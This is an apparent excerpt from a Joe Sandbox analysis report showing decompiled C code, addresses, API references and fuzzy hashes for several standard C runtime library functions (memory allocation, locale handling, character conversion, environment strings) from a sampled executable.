                                      								if(__eflags == 0) {
                                      									_t9 = E00401E66(__eflags);
                                      									 *_t9 = E00401E24(GetLastError());
                                      									goto L17;
                                      								} else {
                                      									__eflags = E00402477(_t7, _t30);
                                      									if(__eflags == 0) {
                                      										_t12 = E00401E66(__eflags);
                                      										 *_t12 = E00401E24(GetLastError());
                                      										L12:
                                      										_t8 = 0;
                                      										__eflags = 0;
                                      									} else {
                                      										continue;
                                      									}
                                      								}
                                      							}
                                      							goto L14;
                                      						}
                                      						E00402477(_t6, _t30);
                                      						 *((intOrPtr*)(E00401E66(__eflags))) = 0xc;
                                      						goto L12;
                                      					} else {
                                      						E004012B0(_a4);
                                      						_t8 = 0;
                                      					}
                                      					L14:
                                      					return _t8;
                                      				} else {
                                      					return E004012EA(__edx, __edi, __esi, _a8);
                                      				}
                                      			}









                                      0x00401387
                                      0x00401394
                                      0x00401395
                                      0x00401398
                                      0x0040139a
                                      0x004013a9
                                      0x004013dc
                                      0x004013dc
                                      0x004013df
                                      0x00000000
                                      0x00000000
                                      0x004013ac
                                      0x004013ae
                                      0x004013b0
                                      0x004013b0
                                      0x004013b0
                                      0x004013bd
                                      0x004013c3
                                      0x004013c5
                                      0x004013c7
                                      0x00401427
                                      0x00401427
                                      0x004013c9
                                      0x004013c9
                                      0x004013cf
                                      0x00401411
                                      0x00401425
                                      0x00000000
                                      0x004013d1
                                      0x004013d8
                                      0x004013da
                                      0x004013f9
                                      0x0040140d
                                      0x004013f3
                                      0x004013f3
                                      0x004013f3
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004013da
                                      0x004013cf
                                      0x00000000
                                      0x004013f5
                                      0x004013e2
                                      0x004013ed
                                      0x00000000
                                      0x0040139c
                                      0x0040139f
                                      0x004013a5
                                      0x004013a5
                                      0x004013f6
                                      0x004013f8
                                      0x00401389
                                      0x00401393
                                      0x00401393

                                      APIs
                                      • _malloc.LIBCMT ref: 0040138C
                                        • Part of subcall function 004012EA: __FF_MSGBANNER.LIBCMT ref: 00401303
                                        • Part of subcall function 004012EA: __NMSG_WRITE.LIBCMT ref: 0040130A
                                        • Part of subcall function 004012EA: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004059AC,?,00000001,?,?,00406229,00000018,0040AE90,0000000C,004062B9), ref: 0040132F
                                      • _free.LIBCMT ref: 0040139F
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: AllocHeap_free_malloc
                                      • String ID:
                                      • API String ID: 2734353464-0
                                      • Opcode ID: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction ID: d24a7906eaa927bdfab9682e7e9c0c1dd222746acacd840904e66b7a229e9837
                                      • Opcode Fuzzy Hash: 43ddb7a184c6da373f4c0bf6b210ad168dbc7d24905898b017241f79401b3c70
                                      • Instruction Fuzzy Hash: 67119432904611ABEB212B75E905A9F3694DB443A4F20453FFC48BA6F1DB3D8C41979D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 78%
                                      			E004058FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                      				signed int _t12;
                                      				void* _t28;
                                      				intOrPtr _t29;
                                      				void* _t30;
                                      				void* _t31;
                                      
                                      				_t31 = __eflags;
                                      				_t26 = __edi;
                                      				_t25 = __edx;
                                      				_t20 = __ebx;
                                      				_push(0xc);
                                      				_push(0x40ae70);
                                      				E00402EC0(__ebx, __edi, __esi);
                                      				_t28 = E004042F0(__ebx, __edx, _t31);
                                      				_t12 =  *0x40ca98; // 0xfffffffe
                                      				if(( *(_t28 + 0x70) & _t12) == 0) {
                                      					L6:
                                      					E0040629E(_t20, _t26, 0xc);
                                      					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                                      					_t29 = _t28 + 0x6c;
                                      					 *((intOrPtr*)(_t30 - 0x1c)) = E004058B2(_t29,  *0x40cce0);
                                      					 *(_t30 - 4) = 0xfffffffe;
                                      					E0040596C();
                                      				} else {
                                      					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
                                      					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                      						goto L6;
                                      					} else {
                                      						_t29 =  *((intOrPtr*)(E004042F0(_t20, __edx, _t33) + 0x6c));
                                      					}
                                      				}
                                      				_t34 = _t29;
                                      				if(_t29 == 0) {
                                      					_push(0x20);
                                      					E0040223C(_t25, _t34);
                                      				}
                                      				return E00402F05(_t29);
                                      			}








                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x004058ff
                                      0x00405901
                                      0x00405906
                                      0x00405910
                                      0x00405912
                                      0x0040591a
                                      0x0040593e
                                      0x00405940
                                      0x00405946
                                      0x00405950
                                      0x0040595b
                                      0x0040595e
                                      0x00405965
                                      0x0040591c
                                      0x0040591c
                                      0x00405920
                                      0x00000000
                                      0x00405922
                                      0x00405927
                                      0x00405927
                                      0x00405920
                                      0x0040592a
                                      0x0040592c
                                      0x0040592e
                                      0x00405930
                                      0x00405935
                                      0x0040593d

                                      APIs
                                      • __getptd.LIBCMT ref: 0040590B
                                        • Part of subcall function 004042F0: __getptd_noexit.LIBCMT ref: 004042F3
                                        • Part of subcall function 004042F0: __amsg_exit.LIBCMT ref: 00404300
                                      • __getptd.LIBCMT ref: 00405922
                                      • __amsg_exit.LIBCMT ref: 00405930
                                      • __lock.LIBCMT ref: 00405940
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00405954
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction ID: 672b8ff66245b7122317208c76101a1feb13e167aa3bf42c285fe57ecdeaa840
                                      • Opcode Fuzzy Hash: 31437981d7cea4519be4af5e9366cedaf90d851205a86ad2be68fc1ec5807629
                                      • Instruction Fuzzy Hash: 06F06272940B00DAE720BBA9950670F33A0AF00764F11417FF845762D2CBBC59509E9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405B0B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                      				char _v8;
                                      				signed int _v12;
                                      				char _v20;
                                      				char _t43;
                                      				char _t46;
                                      				signed int _t53;
                                      				signed int _t54;
                                      				intOrPtr _t56;
                                      				intOrPtr _t57;
                                      				int _t58;
                                      				char _t59;
                                      				short* _t60;
                                      				int _t65;
                                      				char* _t73;
                                      
                                      				_t73 = _a8;
                                      				if(_t73 == 0 || _a12 == 0) {
                                      					L5:
                                      					return 0;
                                      				} else {
                                      					if( *_t73 != 0) {
                                      						E00401EAF( &_v20, __edi, _a16);
                                      						_t43 = _v20;
                                      						__eflags =  *(_t43 + 0x14);
                                      						if( *(_t43 + 0x14) != 0) {
                                      							_t46 = E00405C3B( *_t73 & 0x000000ff,  &_v20);
                                      							__eflags = _t46;
                                      							if(_t46 == 0) {
                                      								__eflags = _a4;
                                      								_t40 = _v20 + 4; // 0x840ffff8
                                      								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                                      								if(__eflags != 0) {
                                      									L10:
                                      									__eflags = _v8;
                                      									if(_v8 != 0) {
                                      										_t53 = _v12;
                                      										_t11 = _t53 + 0x70;
                                      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                      										__eflags =  *_t11;
                                      									}
                                      									return 1;
                                      								}
                                      								L21:
                                      								_t54 = E00401E66(__eflags);
                                      								 *_t54 = 0x2a;
                                      								__eflags = _v8;
                                      								if(_v8 != 0) {
                                      									_t54 = _v12;
                                      									_t33 = _t54 + 0x70;
                                      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                      									__eflags =  *_t33;
                                      								}
                                      								return _t54 | 0xffffffff;
                                      							}
                                      							_t56 = _v20;
                                      							_t15 = _t56 + 0xac; // 0x50036acc
                                      							_t65 =  *_t15;
                                      							__eflags = _t65 - 1;
                                      							if(_t65 <= 1) {
                                      								L17:
                                      								_t24 = _t56 + 0xac; // 0x50036acc
                                      								__eflags = _a12 -  *_t24;
                                      								if(__eflags < 0) {
                                      									goto L21;
                                      								}
                                      								__eflags = _t73[1];
                                      								if(__eflags == 0) {
                                      									goto L21;
                                      								}
                                      								L19:
                                      								_t26 = _t56 + 0xac; // 0x50036acc
                                      								_t57 =  *_t26;
                                      								__eflags = _v8;
                                      								if(_v8 == 0) {
                                      									return _t57;
                                      								}
                                      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                      								return _t57;
                                      							}
                                      							__eflags = _a12 - _t65;
                                      							if(_a12 < _t65) {
                                      								goto L17;
                                      							}
                                      							__eflags = _a4;
                                      							_t21 = _t56 + 4; // 0x840ffff8
                                      							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                                      							__eflags = _t58;
                                      							_t56 = _v20;
                                      							if(_t58 != 0) {
                                      								goto L19;
                                      							}
                                      							goto L17;
                                      						}
                                      						_t59 = _a4;
                                      						__eflags = _t59;
                                      						if(_t59 != 0) {
                                      							 *_t59 =  *_t73 & 0x000000ff;
                                      						}
                                      						goto L10;
                                      					} else {
                                      						_t60 = _a4;
                                      						if(_t60 != 0) {
                                      							 *_t60 = 0;
                                      						}
                                      						goto L5;
                                      					}
                                      				}
                                      			}

















                                      0x00405b15
                                      0x00405b1c
                                      0x00405b33
                                      0x00000000
                                      0x00405b23
                                      0x00405b25
                                      0x00405b3f
                                      0x00405b44
                                      0x00405b47
                                      0x00405b4a
                                      0x00405b72
                                      0x00405b79
                                      0x00405b7b
                                      0x00405bfc
                                      0x00405c0e
                                      0x00405c17
                                      0x00405c19
                                      0x00405b59
                                      0x00405b59
                                      0x00405b5c
                                      0x00405b5e
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00405b61
                                      0x00000000
                                      0x00405b67
                                      0x00405bdb
                                      0x00405bdb
                                      0x00405be0
                                      0x00405be6
                                      0x00405be9
                                      0x00405beb
                                      0x00405bee
                                      0x00405bee
                                      0x00405bee
                                      0x00405bee
                                      0x00000000
                                      0x00405bf2
                                      0x00405b7d
                                      0x00405b80
                                      0x00405b80
                                      0x00405b86
                                      0x00405b89
                                      0x00405bb0
                                      0x00405bb3
                                      0x00405bb3
                                      0x00405bb9
                                      0x00000000
                                      0x00000000
                                      0x00405bbb
                                      0x00405bbe
                                      0x00000000
                                      0x00000000
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc0
                                      0x00405bc6
                                      0x00405bc9
                                      0x00405b38
                                      0x00405b38
                                      0x00405bd2
                                      0x00000000
                                      0x00405bd2
                                      0x00405b8b
                                      0x00405b8e
                                      0x00000000
                                      0x00000000
                                      0x00405b92
                                      0x00405ba0
                                      0x00405ba3
                                      0x00405ba9
                                      0x00405bab
                                      0x00405bae
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00405bae
                                      0x00405b4c
                                      0x00405b4f
                                      0x00405b51
                                      0x00405b56
                                      0x00405b56
                                      0x00000000
                                      0x00405b27
                                      0x00405b27
                                      0x00405b2c
                                      0x00405b30
                                      0x00405b30
                                      0x00000000
                                      0x00405b2c
                                      0x00405b25

                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00405B3F
                                      • __isleadbyte_l.LIBCMT ref: 00405B72
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036ACC,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405BA3
                                      • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,0040766E,00000109,00BFBBEF,00000003), ref: 00405C11
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      • Opcode ID: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction ID: 5a3d825bf4fd5e60fce72e168d96e71c75f88ca3a22c931a5470049bf8964804
                                      • Opcode Fuzzy Hash: 141919e07fd5e067c6abddc3c99e875ae955f847959586c4bcd4af50d38ae265
                                      • Instruction Fuzzy Hash: C5318B31A0064AEFDB20DF64C894AAB3BB5EF01310B1585BAE461AB2D1E734FD41DF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040409C() {
                                      				WCHAR* _t2;
                                      				void* _t15;
                                      				WCHAR* _t17;
                                      
                                      				_t2 = GetEnvironmentStringsW();
                                      				_t17 = _t2;
                                      				if(_t17 != 0) {
                                      					if( *_t17 != 0) {
                                      						goto L3;
                                      						do {
                                      							do {
                                      								L3:
                                      								_t2 =  &(_t2[1]);
                                      							} while ( *_t2 != 0);
                                      							_t2 =  &(_t2[1]);
                                      						} while ( *_t2 != 0);
                                      					}
                                      					_t1 = _t2 - _t17 + 2; // -2
                                      					_t10 = _t1;
                                      					_t15 = E0040599B(_t1);
                                      					if(_t15 != 0) {
                                      						E00405D30(_t15, _t17, _t10);
                                      					}
                                      					FreeEnvironmentStringsW(_t17);
                                      					return _t15;
                                      				} else {
                                      					return 0;
                                      				}
                                      			}






                                      0x0040409f
                                      0x004040a5
                                      0x004040ab
                                      0x004040b4
                                      0x00000000
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b6
                                      0x004040b9
                                      0x004040be
                                      0x004040c1
                                      0x004040b6
                                      0x004040c9
                                      0x004040c9
                                      0x004040d3
                                      0x004040d8
                                      0x004040ea
                                      0x004040ef
                                      0x004040db
                                      0x004040e6
                                      0x004040ad
                                      0x004040b0
                                      0x004040b0

                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(00000000,00401BD2), ref: 0040409F
                                      • __malloc_crt.LIBCMT ref: 004040CE
                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004040DB
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.986629168.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.986624639.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986636336.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 0000000B.00000002.986641539.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_dpgglstunxhpw.jbxd
                                      Similarity
                                      • API ID: EnvironmentStrings$Free__malloc_crt
                                      • String ID:
                                      • API String ID: 237123855-0
                                      • Opcode ID: 14169bbc8571f82bacdc69083f80bd088523dcdba3bfa209bcddabe28d853220
                                      • Instruction ID: 1fa36d951bb440bfa3f85e2b48734ef180dce86ebb10b8179ed48f040844c6ea
                                      • Opcode Fuzzy Hash: 14169bbc8571f82bacdc69083f80bd088523dcdba3bfa209bcddabe28d853220
                                      • Instruction Fuzzy Hash: 61F0E2F75110109ACB31BB35BC498672378DAD536430A483BF701F33C1FA388D8186AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%